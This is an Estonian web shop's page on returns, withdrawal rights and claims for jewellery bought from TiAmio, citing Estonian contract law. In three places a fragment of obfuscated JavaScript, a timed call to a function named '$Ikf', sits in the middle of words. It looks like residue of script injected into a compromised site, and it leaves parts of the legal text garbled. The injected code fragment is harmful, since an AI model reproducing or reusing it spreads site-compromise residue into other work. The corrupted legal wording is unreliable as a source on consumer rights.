Tagastamine

Ostja õigused ostu-müügilepingust taganemisel
Ostjal on õigus taganeda tellimuse alusel sõlmitud ostu-müügi tellimuslepingust. Kõikidele TiAmio e-poest ostetud toodetele, va seadusest tulenevad erijuhud, kehtib vastavalt seadlusandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlusele 14 päevane ostu-müügilepingust taganemisõigus. 14-päevane taganemisõigus ei kehti lepingule, mille esemeks on (VÕS § 53 lg 4):

  • ehe, mis on valmistatud, arvestades lepingupooleks oleva tarbija isiklikke vajadusi – näiteks spetsiaalselt tellitud suurustega sõrmused
  • ehe, mis on valmistatud tarbija esitatud tingimuste kohaselt – näiteks nimeketid või muud isikliku sümboolikaga tooted

Lepingust taganemiseks peab Ostja tegema Müüjale vastavasisulise avalduse e-meili teel ehtekunstnik@tiamio.eu ning seejärel tagastama www.tiamio.eu-st tellitud kauba originaalpakendis. Kui kaubaga oli kaasa arve (juriidiliste isikute puhul), tuleb tagastada ka originaalarve. Kaup tuleb tagastada 14 päeva jooksul alates avalduse tegemisest (VÕS § 562 lg 1), lepingust taganemiseks piisab taganemisavalduse saatmisest seaduses näidatud aja jooksul.

Tagastatud kauba ja selle kätte toimetamiseks kulunud postikulu kantakse kogusummana tagasi samale arvelduskontole, millelt Ostja tasus kauba eest. Müüja tagastab raha Ostjale viivitamata, kuid mitte hiljem kui 14 päeva jooksul lepingust taganemise teate jõudmisest Müüjani (VÕS § 561 lg 1). Lepingust taganemisel toimub paki tagasisaatmiskulude hüvitamine poolte kokkuleppel, kusjuures kuni 10 EURi suuruse kaubaga seotud tagastuskulu kannab ostja (VÕS § 194 lg 4).

Pretensiooni esitamise õigus
TiAmio.eu võtab pretensioone vastu lepingutingimuste mittevastavause eest kahe aasta jooksul (VÕS § 218 lg 2). Pretensiooni ei ole võimalik esitada kauba selle konkreetse puuduse osas, mille olemasolust oli Ostja teadlik enne ostu-müügilepingu sõlmimist (defektiga märgitud tooted – vastaval kaubal on oluliselt alandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andatud müügihinda). TiAmio.eu ei rahulda pretensioonie, kui kauba puudus on tingitud toote valest kasutamisest või toote kulumisest.

Lepingutingimuste mittevastavause korral võib Ostja oma seadusest tulenevate pretensioonide esitamise õigust kasutada teavitades toote lepingutingimustele mittevastavusest Müüjat kahe kuu jooksul alates selle puuduse avaldumisest (VÕS § 220 lg 1).

Müüja õigused ostu-müügilepingust taganemisel
TiAmio.eu-l on õigus tellimuse alusel sõlmitud ostu-müügi tellimuslepingust taganeda, kui Ostja ei ole arvet tasunud või kui tellitav kaubavaru on laost lõppenud. TiAmio.eu-l on õigus muuta käesolevaid lepingu tingimusi ühepoolselt ilma, et tal oleks kohustust teatada sellest kirjalikult e-keskkonna vahendusel Ostjatele. Kui Ostja on esitanud tellimuse enne tingimuste muutmist, siis kehtivad tema ostu-müügilepingule tellimuse hetkel määratud lepingutingimused.
TiAmio.eu-l on õigus mistahes ajal teha e-poe hindades ja ostu-müügi tingimustes muutusi ilma Ostjaid sellest eelnevalt teavitamata.
TiAmio.eu ei vastuta mistahes tehniliste probleemide tõttu (e-poe kasutamise tõrked) Ostjale võimaliku tekkiva kahju eest, sh. tellitud toote hilisema kättetoimetamise eest. Siinkohal on mõeldud müüjast mitte olenevaid tehnilisi probleeme nagu näiteks internetiühendust katkestused, serveri rikked jms. Lõppsätted käesolevatele lepingutingimustele ja ostu-müügi tellimuslepingutes on arvestatud Eesti Vabariigi seadusandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlust. Lepingu tingimusi puudutavad erimeelsused püütakse lahendada eelkõige läbirääkimiste teel.

Probleemide ilmnemisel on soovitav alati ühendust võtta, muidu jäävadki lahendused tulemata!

ehtekunstnik@tiamio.eu või telefoni teel: 5 249 429